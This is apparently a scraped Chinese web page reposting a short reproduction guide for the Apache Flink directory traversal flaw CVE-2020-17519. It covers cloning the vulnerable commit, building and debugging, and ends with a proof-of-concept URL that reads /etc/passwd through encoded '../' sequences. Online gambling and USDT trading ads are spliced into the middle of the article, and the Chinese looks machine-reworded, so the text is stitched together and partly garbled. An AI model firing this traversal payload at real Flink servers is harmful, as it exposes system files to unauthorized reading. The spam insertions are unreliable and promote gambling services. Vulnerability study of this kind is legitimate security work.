当前位置:首页 > 科技 > 正文

usdt无需实名买卖(www.caibao.it):Flink目录穿越破绽浅析(CVE-2020-17519)

01-20 科技

欧博代理

欢迎进入allbet欧博官网(www.ALLbetgame.us)。allbet欧博官网开放ALLBET欧博真人客户端、Allbet代理网页版、Allbet会员网页版、Allbet会员注册、Allbet代理开户、Allbet电脑客户端下载、Allbet手机版下载等业务。

简介

Apache Flink 1.11.0-1.11.2中引入的一项更改,允许攻击者通过JobManager历程的REST接口读取内陆文件系统上的任何文件,接见仅限于JobManager历程可接见的文件。

复现

下载源码:

git clone https://github.com/apache/flink.git

凭据官方通告可以获得修复的commitb561010b0ee741543c3953306037f00d7a9f0801

里边另有测试用例可以去看看。

使用未打补丁的parent-commit搭建环境。

git checkout 7fed9f0243aaf80d0060f075b95ba46b3207c8a8

编译

,

AllbetGmaing下载

欢迎进入AllbetGmaing下载(Allbet Game):www.aLLbetgame.us,欧博官网是欧博集团的官方网站。欧博官网开放Allbet注册、Allbe代理、Allbet电脑客户端、Allbet手机版下载等业务。

,
mvn clean package -DskipTests

一样平常半小时就行

编译后会泛起build-target目录,修改设置文件用于IDEA-DEBUG动态调试

flink-debug-src/build-target/conf/flink-conf.yaml

IDEA调试设置

在设置文件最后添加:

env.java.opts: -agentlib:jdwp=transport=dt_socket,server=y,suspend=y,address=5006

开启服务

flink-debug-src/build-target/bin/start-cluster.sh

POC

http://localhost:8081/jobmanager/logs/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
登录并阅读全文

热点网版权保护: 转载请保留链接: http://www.yl282828.com

博客主人

推荐文章

热门文章

随机文章